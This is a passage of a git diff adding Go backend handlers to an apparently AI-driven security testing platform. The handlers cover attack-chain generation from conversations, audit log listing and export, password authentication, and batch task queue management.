map[string]*sync.Mutex +} + +// NewAttackChainHandler 创建新的攻击链处理器 +func NewAttackChainHandler(db *database.DB, openAIConfig *config.OpenAIConfig, logger *zap.Logger) *AttackChainHandler { + return &AttackChainHandler{ + db: db, + logger: logger, + openAIConfig: openAIConfig, + } +} + +// UpdateConfig 更新OpenAI配置 +func (h *AttackChainHandler) UpdateConfig(cfg *config.OpenAIConfig) { + h.mu.Lock() + defer h.mu.Unlock() + h.openAIConfig = cfg + h.logger.Info("AttackChainHandler配置已更新", + zap.String("base_url", cfg.BaseURL), + zap.String("model", cfg.Model), + ) +} + +// getOpenAIConfig 获取OpenAI配置(线程安全) +func (h *AttackChainHandler) getOpenAIConfig() *config.OpenAIConfig { + h.mu.RLock() + defer h.mu.RUnlock() + return h.openAIConfig +} + +// GetAttackChain 获取攻击链(按需生成) +// GET /api/attack-chain/:conversationId +func (h *AttackChainHandler) GetAttackChain(c *gin.Context) { + conversationID := c.Param("conversationId") + if conversationID == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "conversationId is required"}) + return + } + + // 检查对话是否存在 + _, err := h.db.GetConversation(conversationID) + if err != nil { + h.logger.Warn("对话不存在", zap.String("conversationId", conversationID), zap.Error(err)) + c.JSON(http.StatusNotFound, gin.H{"error": "对话不存在"}) + return + } + + // 先尝试从数据库加载(如果已生成过) + openAIConfig := h.getOpenAIConfig() + builder := attackchain.NewBuilder(h.db, openAIConfig, h.logger) + chain, err := builder.LoadChainFromDatabase(conversationID) + if err == nil && len(chain.Nodes) > 0 { + // 如果已存在,直接返回 + h.logger.Info("返回已存在的攻击链", zap.String("conversationId", conversationID)) + c.JSON(http.StatusOK, chain) + return + } + + // 如果不存在,则生成新的攻击链(按需生成) + // 使用锁机制防止同一对话的并发生成 + lockInterface, _ := h.generatingLocks.LoadOrStore(conversationID, &sync.Mutex{}) + lock := lockInterface.(*sync.Mutex) + + // 尝试获取锁,如果正在生成则返回错误 + acquired := lock.TryLock() + if !acquired { + h.logger.Info("攻击链正在生成中,请稍后再试", zap.String("conversationId", conversationID)) + c.JSON(http.StatusConflict, gin.H{"error": "攻击链正在生成中,请稍后再试"}) + return + } + defer lock.Unlock() + + // 再次检查是否已生成(可能在等待锁的过程中已经生成完成) + chain, err = builder.LoadChainFromDatabase(conversationID) + if err == nil && len(chain.Nodes) > 0 { + h.logger.Info("返回已存在的攻击链(在锁等待期间已生成)", zap.String("conversationId", conversationID)) + c.JSON(http.StatusOK, chain) + return + } + + h.logger.Info("开始生成攻击链", zap.String("conversationId", conversationID)) + + ctx, cancel := context.WithTimeout(context.Background(), 5*time.Minute) + defer cancel() + + chain, err = builder.BuildChainFromConversation(ctx, conversationID) + if err != nil { + h.logger.Error("生成攻击链失败", zap.String("conversationId", conversationID), zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": "生成攻击链失败: " + err.Error()}) + return + } + + // 生成完成后,从锁映射中删除(可选,保留也可以用于防止短时间内重复生成) + // h.generatingLocks.Delete(conversationID) + + c.JSON(http.StatusOK, chain) +} + +// RegenerateAttackChain 重新生成攻击链 +// POST /api/attack-chain/:conversationId/regenerate +func (h *AttackChainHandler) RegenerateAttackChain(c *gin.Context) { + conversationID := c.Param("conversationId") + if conversationID == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "conversationId is required"}) + return + } + + // 检查对话是否存在 + _, err := h.db.GetConversation(conversationID) + if err != nil { + h.logger.Warn("对话不存在", zap.String("conversationId", conversationID), zap.Error(err)) + c.JSON(http.StatusNotFound, gin.H{"error": "对话不存在"}) + return + } + + // 删除旧的攻击链 + if err := h.db.DeleteAttackChain(conversationID); err != nil { + h.logger.Warn("删除旧攻击链失败", zap.Error(err)) + } + + // 使用锁机制防止并发生成 + lockInterface, _ := h.generatingLocks.LoadOrStore(conversationID, &sync.Mutex{}) + lock := lockInterface.(*sync.Mutex) + + acquired := lock.TryLock() + if !acquired { + h.logger.Info("攻击链正在生成中,请稍后再试", zap.String("conversationId", conversationID)) + c.JSON(http.StatusConflict, gin.H{"error": "攻击链正在生成中,请稍后再试"}) + return + } + defer lock.Unlock() + + // 生成新的攻击链 + h.logger.Info("重新生成攻击链", zap.String("conversationId", conversationID)) + + ctx, cancel := context.WithTimeout(context.Background(), 5*time.Minute) + defer cancel() + + openAIConfig := h.getOpenAIConfig() + builder := attackchain.NewBuilder(h.db, openAIConfig, h.logger) + chain, err := builder.BuildChainFromConversation(ctx, conversationID) + if err != nil { + h.logger.Error("生成攻击链失败", zap.String("conversationId", conversationID), zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": "生成攻击链失败: " + err.Error()}) + return + } + + c.JSON(http.StatusOK, chain) +} diff --git a/internal/handler/audit.go b/internal/handler/audit.go new file mode 100644 index 00000000..7cb4dd47 --- /dev/null +++ b/internal/handler/audit.go @@ -0,0 +1,147 @@ +package handler + +import ( + "net/http" + "time" + + "cyberstrike-ai/internal/audit" + "cyberstrike-ai/internal/database" + + "github.com/gin-gonic/gin" + "go.uber.org/zap" +) + +// AuditHandler serves platform audit log APIs. +type AuditHandler struct { + db *database.DB + audit *audit.Service + logger *zap.Logger +} + +// NewAuditHandler creates an audit log handler. +func NewAuditHandler(db *database.DB, auditSvc *audit.Service, logger *zap.Logger) *AuditHandler { + return &AuditHandler{db: db, audit: auditSvc, logger: logger} +} + +// Meta GET /api/audit/meta +func (h *AuditHandler) Meta(c *gin.Context) { + enabled := false + retentionDays := 0 + if h.audit != nil { + enabled = h.audit.Enabled() + retentionDays = h.audit.RetentionDays() + } + c.JSON(http.StatusOK, gin.H{ + "enabled": enabled, + "retention_days": retentionDays, + "default_page_size": 20, + "max_page_size": 100, + "max_export": 5000, + }) +} + +// Summary GET /api/audit/summary +func (h *AuditHandler) Summary(c *gin.Context) { + if h.db == nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": "database unavailable"}) + return + } + base := auditFilterFromQuery(c) + total, err := h.db.CountAuditLogs(base) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + failFilter := base + failFilter.Result = "failure" + failures, err := h.db.CountAuditLogs(failFilter) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + since := time.Now().AddDate(0, 0, -7) + recentFilter := base + recentFilter.Since = &since + recent7d, err := h.db.CountAuditLogs(recentFilter) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{ + "total": total, + "failures": failures, + "recent_7d": recent7d, + "has_filters": c.Query("category") != "" || c.Query("action") != "" || c.Query("result") != "" || + c.Query("q") != "" || c.Query("since") != "" || c.Query("until") != "", + }) +} + +// ListLogs GET /api/audit/logs +func (h *AuditHandler) ListLogs(c *gin.Context) { + if h.db == nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": "database unavailable"}) + return + } + filter := auditFilterFromQuery(c) + page, pageSize := auditPaginationFromQuery(c) + filter.Limit = pageSize + filter.Offset = (page - 1) * pageSize + + logs, err := h.db.ListAuditLogs(filter) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + total, err := h.db.CountAuditLogs(filter) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{ + "logs": logs, + "total": total, + "page": page, + "page_size": pageSize, + }) +} + +// GetLog GET /api/audit/logs/:id +func (h *AuditHandler) GetLog(c *gin.Context) { + if h.db == nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": "database unavailable"}) + return + } + row, err := h.db.GetAuditLogByID(c.Param("id")) + if err != nil { + c.JSON(http.StatusNotFound, gin.H{"error": "审计记录不存在"}) + return + } + audit.ApplyResourceAvailability(h.db, row) + c.JSON(http.StatusOK, gin.H{"log": row}) +} + +// ExportLogs GET /api/audit/logs/export — JSON or CSV (?format=csv), max 5000 rows. +func (h *AuditHandler) ExportLogs(c *gin.Context) { + if h.db == nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": "database unavailable"}) + return + } + filter := auditFilterFromQuery(c) + filter.Limit = 5000 + filter.Offset = 0 + + logs, err := h.db.ListAuditLogs(filter) + if err != nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if c.Query("format") == "csv" { + writeAuditLogsCSV(c, logs) + return + } + c.Header("Content-Disposition", `attachment; filename="audit-logs.json"`) + c.JSON(http.StatusOK, gin.H{ + "exported_at": time.Now().UTC().Format(time.RFC3339), + "logs": logs, + }) +} diff --git a/internal/handler/audit_export_csv.go b/internal/handler/audit_export_csv.go new file mode 100644 index 00000000..debf10c9 --- /dev/null +++ b/internal/handler/audit_export_csv.go @@ -0,0 +1,42 @@ +package handler + +import ( + "encoding/csv" + "fmt" + "time" + + "cyberstrike-ai/internal/database" + + "github.com/gin-gonic/gin" +) + +func writeAuditLogsCSV(c *gin.Context, logs []*database.AuditLog) { + c.Header("Content-Type", "text/csv; charset=utf-8") + c.Header("Content-Disposition", fmt.Sprintf(`attachment; filename="audit-logs-%s.csv"`, time.Now().Format("20060102"))) + + w := csv.NewWriter(c.Writer) + _ = w.Write([]string{ + "id", "created_at", "level", "category", "action", "result", "actor", + "session_hint", "client_ip", "resource_type", "resource_id", "message", + }) + for _, row := range logs { + if row == nil { + continue + } + _ = w.Write([]string{ + row.ID, + row.CreatedAt.UTC().Format(time.RFC3339), + row.Level, + row.Category, + row.Action, + row.Result, + row.Actor, + row.SessionHint, + row.ClientIP, + row.ResourceType, + row.ResourceID, + row.Message, + }) + } + w.Flush() +} diff --git a/internal/handler/audit_query.go b/internal/handler/audit_query.go new file mode 100644 index 00000000..9c08826d --- /dev/null +++ b/internal/handler/audit_query.go @@ -0,0 +1,47 @@ +package handler + +import ( + "strconv" + + "cyberstrike-ai/internal/database" + + "github.com/gin-gonic/gin" +) + +func auditFilterFromQuery(c *gin.Context) database.ListAuditLogsFilter { + filter := database.ListAuditLogsFilter{ + Level: c.Query("level"), + Category: c.Query("category"), + Action: c.Query("action"), + Result: c.Query("result"), + Query: c.Query("q"), + ResourceType: c.Query("resource_type"), + ResourceID: c.Query("resource_id"), + } + if since := c.Query("since"); since != "" { + if t, err := database.ParseRFC3339Time(since); err == nil { + filter.Since = &t + } + } + if until := c.Query("until"); until != "" { + if t, err := database.ParseRFC3339Time(until); err == nil { + filter.Until = &t + } + } + return filter +} + +func auditPaginationFromQuery(c *gin.Context) (page, pageSize int) { + page = 1 + pageSize = 20 + if p, err := strconv.Atoi(c.DefaultQuery("page", "1")); err == nil && p > 0 { + page = p + } + if ps, err := strconv.Atoi(c.DefaultQuery("page_size", "20")); err == nil && ps > 0 { + pageSize = ps + if pageSize > 100 { + pageSize = 100 + } + } + return page, pageSize +} diff --git a/internal/handler/auth.go b/internal/handler/auth.go new file mode 100644 index 00000000..a0e940d2 --- /dev/null +++ b/internal/handler/auth.go @@ -0,0 +1,211 @@ +package handler + +import ( + "net/http" + "strings" + "time" + + "cyberstrike-ai/internal/audit" + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/security" + + "github.com/gin-gonic/gin" + "go.uber.org/zap" +) + +// AuthHandler handles authentication-related endpoints. +type AuthHandler struct { + manager *security.AuthManager + config *config.Config + configPath string + logger *zap.Logger + audit *audit.Service +} + +// SetAudit wires platform audit logging. +func (h *AuthHandler) SetAudit(s *audit.Service) { + h.audit = s +} + +// NewAuthHandler creates a new AuthHandler. +func NewAuthHandler(manager *security.AuthManager, cfg *config.Config, configPath string, logger *zap.Logger) *AuthHandler { + return &AuthHandler{ + manager: manager, + config: cfg, + configPath: configPath, + logger: logger, + } +} + +type loginRequest struct { + Password string `json:"password" binding:"required"` +} + +type changePasswordRequest struct { + OldPassword string `json:"oldPassword"` + NewPassword string `json:"newPassword"` +} + +// Login verifies password and returns a session token. +func (h *AuthHandler) Login(c *gin.Context) { + var req loginRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "密码不能为空"}) + return + } + + token, expiresAt, err := h.manager.Authenticate(req.Password) + if err != nil { + if h.audit != nil { + h.audit.Record(c, audit.Entry{ + Level: "warn", + Category: "auth", + Action: "login", + Result: "failure", + Message: "登录失败:密码错误", + }) + } + c.JSON(http.StatusUnauthorized, gin.H{"error": "密码错误"}) + return + } + + if h.audit != nil { + h.audit.Record(c, audit.Entry{ + Category: "auth", + Action: "login", + Result: "success", + SessionHint: audit.HintFromToken(token), + Message: "登录成功", + Detail: map[string]interface{}{ + "expires_at": expiresAt.UTC().Format(time.RFC3339), + }, + }) + } + + c.JSON(http.StatusOK, gin.H{ + "token": token, + "expires_at": expiresAt.UTC().Format(time.RFC3339), + "session_duration_hr": h.manager.SessionDurationHours(), + }) +} + +// Logout revokes the current session token. +func (h *AuthHandler) Logout(c *gin.Context) { + token := c.GetString(security.ContextAuthTokenKey) + if token == "" { + authHeader := c.GetHeader("Authorization") + if len(authHeader) > 7 && strings.EqualFold(authHeader[:7], "Bearer ") { + token = strings.TrimSpace(authHeader[7:]) + } else { + token = strings.TrimSpace(authHeader) + } + } + + h.manager.RevokeToken(token) + if h.audit != nil { + h.audit.Record(c, audit.Entry{ + Category: "auth", + Action: "logout", + Result: "success", + Message: "退出登录", + }) + } + c.JSON(http.StatusOK, gin.H{"message": "已退出登录"}) +} + +// ChangePassword updates the login password. +func (h *AuthHandler) ChangePassword(c *gin.Context) { + var req changePasswordRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "参数无效"}) + return + } + + oldPassword := strings.TrimSpace(req.OldPassword) + newPassword := strings.TrimSpace(req.NewPassword) + + if oldPassword == "" || newPassword == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "当前密码和新密码均不能为空"}) + return + } + + if len(newPassword) < 8 { + c.JSON(http.StatusBadRequest, gin.H{"error": "新密码长度至少需要 8 位"}) + return + } + + if oldPassword == newPassword { + c.JSON(http.StatusBadRequest, gin.H{"error": "新密码不能与旧密码相同"}) + return + } + + if !h.manager.CheckPassword(oldPassword) { + if h.audit != nil { + h.audit.Record(c, audit.Entry{ + Level: "warn", + Category: "auth", + Action: "change_password", + Result: "failure", + Message: "修改密码失败:当前密码不正确", + }) + } + c.JSON(http.StatusBadRequest, gin.H{"error": "当前密码不正确"}) + return + } + + if err := config.PersistAuthPassword(h.configPath, newPassword); err != nil { + if h.logger != nil { + h.logger.Error("保存新密码失败", zap.Error(err)) + } + c.JSON(http.StatusInternalServerError, gin.H{"error": "保存新密码失败,请重试"}) + return + } + + if err := h.manager.UpdateConfig(newPassword, h.config.Auth.SessionDurationHours); err != nil { + if h.logger != nil { + h.logger.Error("更新认证配置失败", zap.Error(err)) + } + c.JSON(http.StatusInternalServerError, gin.H{"error": "更新认证配置失败"}) + return + } + + h.config.Auth.Password = newPassword + h.config.Auth.GeneratedPassword = "" + h.config.Auth.GeneratedPasswordPersisted = false + h.config.Auth.GeneratedPasswordPersistErr = "" + + if h.logger != nil { + h.logger.Info("登录密码已更新,所有会话已失效") + } + + if h.audit != nil { + h.audit.Record(c, audit.Entry{ + Category: "auth", + Action: "change_password", + Result: "success", + Message: "登录密码已修改", + }) + } + + c.JSON(http.StatusOK, gin.H{"message": "密码已更新,请使用新密码重新登录"}) +} + +// Validate returns the current session status. +func (h *AuthHandler) Validate(c *gin.Context) { + token := c.GetString(security.ContextAuthTokenKey) + if token == "" { + c.JSON(http.StatusUnauthorized, gin.H{"error": "会话无效"}) + return + } + + session, ok := h.manager.ValidateToken(token) + if !ok { + c.JSON(http.StatusUnauthorized, gin.H{"error": "会话已过期"}) + return + } + + c.JSON(http.StatusOK, gin.H{ + "token": session.Token, + "expires_at": session.ExpiresAt.UTC().Format(time.RFC3339), + }) +} diff --git a/internal/handler/batch_task_manager.go b/internal/handler/batch_task_manager.go new file mode 100644 index 00000000..5bdd2018 --- /dev/null +++ b/internal/handler/batch_task_manager.go @@ -0,0 +1,1127 @@ +package handler + +import ( + "context" + "crypto/rand" + "encoding/hex" + "fmt" + "sort" + "strings" + "sync" + "time" + "unicode/utf8" + + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/database" + + "go.uber.org/zap" +) + +// 批量任务状态常量 +const ( + BatchQueueStatusPending = "pending" + BatchQueueStatusRunning = "running" + BatchQueueStatusPaused = "paused" + BatchQueueStatusCompleted = "completed" + BatchQueueStatusCancelled = "cancelled" + + BatchTaskStatusPending = "pending" + BatchTaskStatusRunning = "running" + BatchTaskStatusCompleted = "completed" + BatchTaskStatusFailed = "failed" + BatchTaskStatusCancelled = "cancelled" + + // MaxBatchTasksPerQueue 单个队列最大任务数 + MaxBatchTasksPerQueue = 10000 + + // MaxBatchQueueTitleLen 队列标题最大长度 + MaxBatchQueueTitleLen = 200 + + // MaxBatchQueueRoleLen 角色名最大长度 + MaxBatchQueueRoleLen = 100 +) + +// BatchTask 批量任务项 +type BatchTask struct { + ID string `json:"id"` + Message string `json:"message"` + ConversationID string `json:"conversationId,omitempty"` + Status string `json:"status"` // pending, running, completed, failed, cancelled + StartedAt *time.Time `json:"startedAt,omitempty"` + CompletedAt *time.Time `json:"completedAt,omitempty"` + Error string `json:"error,omitempty"` + Result string `json:"result,omitempty"` +} + +// BatchTaskQueue 批量任务队列 +type BatchTaskQueue struct { + ID string `json:"id"` + Title string `json:"title,omitempty"` + Role string `json:"role,omitempty"` // 角色名称(空字符串表示默认角色) + AgentMode string `json:"agentMode"` // single | eino_single | deep | plan_execute | supervisor + ScheduleMode string `json:"scheduleMode"` // manual | cron + CronExpr string `json:"cronExpr,omitempty"` + NextRunAt *time.Time `json:"nextRunAt,omitempty"` + ScheduleEnabled bool `json:"scheduleEnabled"` + LastScheduleTriggerAt *time.Time `json:"lastScheduleTriggerAt,omitempty"` + LastScheduleError string `json:"lastScheduleError,omitempty"` + LastRunError string `json:"lastRunError,omitempty"` + ProjectID string `json:"projectId,omitempty"` + Tasks []*BatchTask `json:"tasks"` + Status string `json:"status"` // pending, running, paused, completed, cancelled + CreatedAt time.Time `json:"createdAt"` + StartedAt *time.Time `json:"startedAt,omitempty"` + CompletedAt *time.Time `json:"completedAt,omitempty"` + CurrentIndex int `json:"currentIndex"` +} + +// BatchTaskManager 批量任务管理器 +type BatchTaskManager struct { + db *database.DB + logger *zap.Logger + queues map[string]*BatchTaskQueue + taskCancels map[string]context.CancelFunc // 存储每个队列当前任务的取消函数 + mu sync.RWMutex +} + +// NewBatchTaskManager 创建批量任务管理器 +func NewBatchTaskManager(logger *zap.Logger) *BatchTaskManager { + if logger == nil { + logger = zap.NewNop() + } + return &BatchTaskManager{ + logger: logger, + queues: make(map[string]*BatchTaskQueue), + taskCancels: make(map[string]context.CancelFunc), + } +} + +// SetDB 设置数据库连接 +func (m *BatchTaskManager) SetDB(db *database.DB) { + m.mu.Lock() + defer m.mu.Unlock() + m.db = db +} + +// CreateBatchQueue 创建批量任务队列 +func (m *BatchTaskManager) CreateBatchQueue( + title, role, agentMode, scheduleMode, cronExpr, projectID string, + nextRunAt *time.Time, + tasks []string, +) (*BatchTaskQueue, error) { + // 输入校验 + if utf8.RuneCountInString(title) > MaxBatchQueueTitleLen { + return nil, fmt.Errorf("标题不能超过 %d 个字符", MaxBatchQueueTitleLen) + } + if utf8.RuneCountInString(role) > MaxBatchQueueRoleLen { + return nil, fmt.Errorf("角色名不能超过 %d 个字符", MaxBatchQueueRoleLen) + } + if len(tasks) > MaxBatchTasksPerQueue { + return nil, fmt.Errorf("单个队列最多 %d 条任务", MaxBatchTasksPerQueue) + } + + m.mu.Lock() + defer m.mu.Unlock() + + queueID := time.Now().Format("20060102150405") + "-" + generateShortID() + queue := &BatchTaskQueue{ + ID: queueID, + Title: title, + Role: role, + ProjectID: strings.TrimSpace(projectID), + AgentMode: config.NormalizeAgentMode(agentMode), + ScheduleMode: normalizeBatchQueueScheduleMode(scheduleMode), + CronExpr: strings.TrimSpace(cronExpr), + NextRunAt: nextRunAt, + ScheduleEnabled: true, + Tasks: make([]*BatchTask, 0, len(tasks)), + Status: BatchQueueStatusPending, + CreatedAt: time.Now(), + CurrentIndex: 0, + } + if queue.ScheduleMode != "cron" { + queue.CronExpr = "" + queue.NextRunAt = nil + } + + // 准备数据库保存的任务数据 + dbTasks := make([]map[string]interface{}, 0, len(tasks)) + + for _, message := range tasks { + if message == "" { + continue // 跳过空行 + } + taskID := generateShortID() + task := &BatchTask{ + ID: taskID, + Message: message, + Status: BatchTaskStatusPending, + } + queue.Tasks = append(queue.Tasks, task) + dbTasks = append(dbTasks, map[string]interface{}{ + "id": taskID, + "message": message, + }) + } + + // 保存到数据库 + if m.db != nil { + if err := m.db.CreateBatchQueue( + queueID, + title, + role, + queue.AgentMode, + queue.ScheduleMode, + queue.CronExpr, + queue.NextRunAt, + queue.ProjectID, + dbTasks, + ); err != nil { + m.logger.Warn("batch queue DB create failed", zap.String("queueId", queueID), zap.Error(err)) + } + } + + m.queues[queueID] = queue + return queue, nil +} + +// GetBatchQueue 获取批量任务队列 +func (m *BatchTaskManager) GetBatchQueue(queueID string) (*BatchTaskQueue, bool) { + m.mu.RLock() + queue, exists := m.queues[queueID] + m.mu.RUnlock() + + if exists { + return queue, true + } + + // 如果内存中不存在,尝试从数据库加载 + if m.db != nil { + if queue := m.loadQueueFromDB(queueID); queue != nil { + m.mu.Lock() + m.queues[queueID] = queue + m.mu.Unlock() + return queue, true + } + } + + return nil, false +} + +// loadQueueFromDB 从数据库加载单个队列 +func (m *BatchTaskManager) loadQueueFromDB(queueID string) *BatchTaskQueue { + if m.db == nil { + return nil + } + + queueRow, err := m.db.GetBatchQueue(queueID) + if err != nil || queueRow == nil { + return nil + } + + taskRows, err := m.db.GetBatchTasks(queueID) + if err != nil { + return nil + } + + queue := &BatchTaskQueue{ + ID: queueRow.ID, + AgentMode: "eino_single", + ScheduleMode: "manual", + Status: queueRow.Status, + CreatedAt: queueRow.CreatedAt, + CurrentIndex: queueRow.CurrentIndex, + Tasks: make([]*BatchTask, 0, len(taskRows)), + } + + if queueRow.Title.Valid { + queue.Title = queueRow.Title.String + } + if queueRow.Role.Valid { + queue.Role = queueRow.Role.String + } + if queueRow.AgentMode.Valid { + queue.AgentMode = config.NormalizeAgentMode(queueRow.AgentMode.String) + } + if queueRow.ScheduleMode.Valid { + queue.ScheduleMode = normalizeBatchQueueScheduleMode(queueRow.ScheduleMode.String) + } + if queueRow.CronExpr.Valid && queue.ScheduleMode == "cron" { + queue.CronExpr = strings.TrimSpace(queueRow.CronExpr.String) + } + if queueRow.NextRunAt.Valid && queue.ScheduleMode == "cron" { + t := queueRow.NextRunAt.Time + queue.NextRunAt = &t + } + queue.ScheduleEnabled = true + if queueRow.ScheduleEnabled.Valid && queueRow.ScheduleEnabled.Int64 == 0 { + queue.ScheduleEnabled = false + } + if queueRow.LastScheduleTriggerAt.Valid { + t := queueRow.LastScheduleTriggerAt.Time + queue.LastScheduleTriggerAt = &t + } + if queueRow.LastScheduleError.Valid { + queue.LastScheduleError = strings.TrimSpace(queueRow.LastScheduleError.String) + } + if queueRow.LastRunError.Valid { + queue.LastRunError = strings.TrimSpace(queueRow.LastRunError.String) + } + if queueRow.ProjectID.Valid { + queue.ProjectID = strings.TrimSpace(queueRow.ProjectID.String) + } + if queueRow.StartedAt.Valid { + queue.StartedAt = &queueRow.StartedAt.Time + } + if queueRow.CompletedAt.Valid { + queue.CompletedAt = &queueRow.CompletedAt.Time + } + + for _, taskRow := range taskRows { + task := &BatchTask{ + ID: taskRow.ID, + Message: taskRow.Message, + Status: taskRow.Status, + } + if taskRow.ConversationID.Valid { + task.ConversationID = taskRow.ConversationID.String + } + if taskRow.StartedAt.Valid { + task.StartedAt = &taskRow.StartedAt.Time + } + if taskRow.CompletedAt.Valid { + task.CompletedAt = &taskRow.CompletedAt.Time + } + if taskRow.Error.Valid { + task.Error = taskRow.Error.String + } + if taskRow.Result.Valid { + task.Result = taskRow.Result.String + } + queue.Tasks = append(queue.Tasks, task) + } + + return queue +} + +// GetLoadedQueues 获取内存中已加载的队列(不触发 DB 加载,仅用 RLock) +func (m *BatchTaskManager) GetLoadedQueues() []*BatchTaskQueue { + m.mu.RLock() + result := make([]*BatchTaskQueue, 0, len(m.queues)) + for _, queue := range m.queues { + result = append(result, queue) + } + m.mu.RUnlock() + return result +} + +// GetAllQueues 获取所有队列 +func (m *BatchTaskManager) GetAllQueues() []*BatchTaskQueue { + m.mu.RLock() + result := make([]*BatchTaskQueue, 0, len(m.queues)) + for _, queue := range m.queues { + result = append(result, queue) + } + m.mu.RUnlock() + + // 如果数据库可用,确保所有数据库中的队列都已加载到内存 + if m.db != nil { + dbQueues, err := m.db.GetAllBatchQueues() + if err == nil { + m.mu.Lock() + for _, queueRow := range dbQueues { + if _, exists := m.queues[queueRow.ID]; !exists { + if queue := m.loadQueueFromDB(queueRow.ID); queue != nil { + m.queues[queueRow.ID] = queue + result = append(result, queue) + } + } + } + m.mu.Unlock() + } + } + + return result +} + +// ListQueues 列出队列(支持筛选和分页) +func (m *BatchTaskManager) ListQueues(limit, offset int, status, keyword string) ([]*BatchTaskQueue, int, error) { + var queues []*BatchTaskQueue + var total int + + // 如果数据库可用,从数据库查询 + if m.db != nil { + // 获取总数 + count, err := m.db.CountBatchQueues(status, keyword) + if err != nil { + return nil, 0, fmt.Errorf("统计队列总数失败: %w", err) + } + total = count + + // 获取队列列表(只获取ID) + queueRows, err := m.db.ListBatchQueues(limit, offset, status, keyword) + if err != nil { + return nil, 0, fmt.Errorf("查询队列列表失败: %w", err) + } + + // 加载完整的队列信息(从内存或数据库) + m.mu.Lock() + for _, queueRow := range queueRows { + var queue *BatchTaskQueue + // 先从内存查找 + if cached, exists := m.queues[queueRow.ID]; exists { + queue = cached + } else { + // 从数据库加载 + queue = m.loadQueueFromDB(queueRow.ID) + if queue != nil { + m.queues[queueRow.ID] = queue + } + } + if queue != nil { + queues = append(queues, queue) + } + } + m.mu.Unlock() + } else { + // 没有数据库,从内存中筛选和分页 + m.mu.RLock() + allQueues := make([]*BatchTaskQueue, 0, len(m.queues)) + for _, queue := range m.queues { + allQueues = append(allQueues, queue) + } + m.mu.RUnlock() + + // 筛选 + filtered := make([]*BatchTaskQueue, 0) + for _, queue := range allQueues { + // 状态筛选 + if status != "" && status != "all" && queue.Status != status { + continue + } + // 关键字搜索(搜索队列ID和标题) + if keyword != "" { + keywordLower := strings.ToLower(keyword) + queueIDLower := strings.ToLower(queue.ID) + queueTitleLower := strings.ToLower(queue.Title) + if !strings.Contains(queueIDLower, keywordLower) && !strings.Contains(queueTitleLower, keywordLower) { + // 也可以搜索创建时间 + createdAtStr := queue.CreatedAt.Format("2006-01-02 15:04:05") + if !strings.Contains(createdAtStr, keyword) { + continue + } + } + } + filtered = append(filtered, queue) + } + + // 按创建时间倒序排序 + sort.Slice(filtered, func(i, j int) bool { + return filtered[i].CreatedAt.After(filtered[j].CreatedAt) + }) + + total = len(filtered) + + // 分页 + start := offset + if start > len(filtered) { + start = len(filtered) + } + end := start + limit + if end > len(filtered) { + end = len(filtered) + } + if start < len(filtered) { + queues = filtered[start:end] + } + } + + return queues, total, nil +} + +// LoadFromDB 从数据库加载所有队列 +func (m *BatchTaskManager) LoadFromDB() error { + if m.db == nil { + return nil + } + + queueRows, err := m.db.GetAllBatchQueues() + if err != nil { + return err + } + + m.mu.Lock() + defer m.mu.Unlock() + + for _, queueRow := range queueRows { + if _, exists := m.queues[queueRow.ID]; exists { + continue // 已存在,跳过 + } + + taskRows, err := m.db.GetBatchTasks(queueRow.ID) + if err != nil { + continue // 跳过加载失败的任务 + } + + queue := &BatchTaskQueue{ + ID: queueRow.ID, + AgentMode: "eino_single", + ScheduleMode: "manual", + Status: queueRow.Status, + CreatedAt: queueRow.CreatedAt, + CurrentIndex: queueRow.CurrentIndex, + Tasks: make([]*BatchTask, 0, len(taskRows)), + } + + if queueRow.Title.Valid { + queue.Title = queueRow.Title.String + } + if queueRow.Role.Valid { + queue.Role = queueRow.Role.String + } + if queueRow.AgentMode.Valid { + queue.AgentMode = config.NormalizeAgentMode(queueRow.AgentMode.String) + } + if queueRow.ScheduleMode.Valid { + queue.ScheduleMode = normalizeBatchQueueScheduleMode(queueRow.ScheduleMode.String) + } + if queueRow.CronExpr.Valid && queue.ScheduleMode == "cron" { + queue.CronExpr = strings.TrimSpace(queueRow.CronExpr.String) + } + if queueRow.NextRunAt.Valid && queue.ScheduleMode == "cron" { + t := queueRow.NextRunAt.Time + queue.NextRunAt = &t + } + queue.ScheduleEnabled = true + if queueRow.ScheduleEnabled.Valid && queueRow.ScheduleEnabled.Int64 == 0 { + queue.ScheduleEnabled = false + } + if queueRow.LastScheduleTriggerAt.Valid { + t := queueRow.LastScheduleTriggerAt.Time + queue.LastScheduleTriggerAt = &t + } + if queueRow.LastScheduleError.Valid { + queue.LastScheduleError = strings.TrimSpace(queueRow.LastScheduleError.String) + } + if queueRow.LastRunError.Valid { + queue.LastRunError = strings.TrimSpace(queueRow.LastRunError.String) + } + if queueRow.ProjectID.Valid { + queue.ProjectID = strings.TrimSpace(queueRow.ProjectID.String) + } + if queueRow.StartedAt.Valid { + queue.StartedAt = &queueRow.StartedAt.Time + } + if queueRow.CompletedAt.Valid { + queue.CompletedAt = &queueRow.CompletedAt.Time + } + + for _, taskRow := range taskRows { + task := &BatchTask{ + ID: taskRow.ID, + Message: taskRow.Message, + Status: taskRow.Status, + } + if taskRow.ConversationID.Valid { + task.ConversationID = taskRow.ConversationID.String + } + if taskRow.StartedAt.Valid { + task.StartedAt = &taskRow.StartedAt.Time + } + if taskRow.CompletedAt.Valid { + task.CompletedAt = 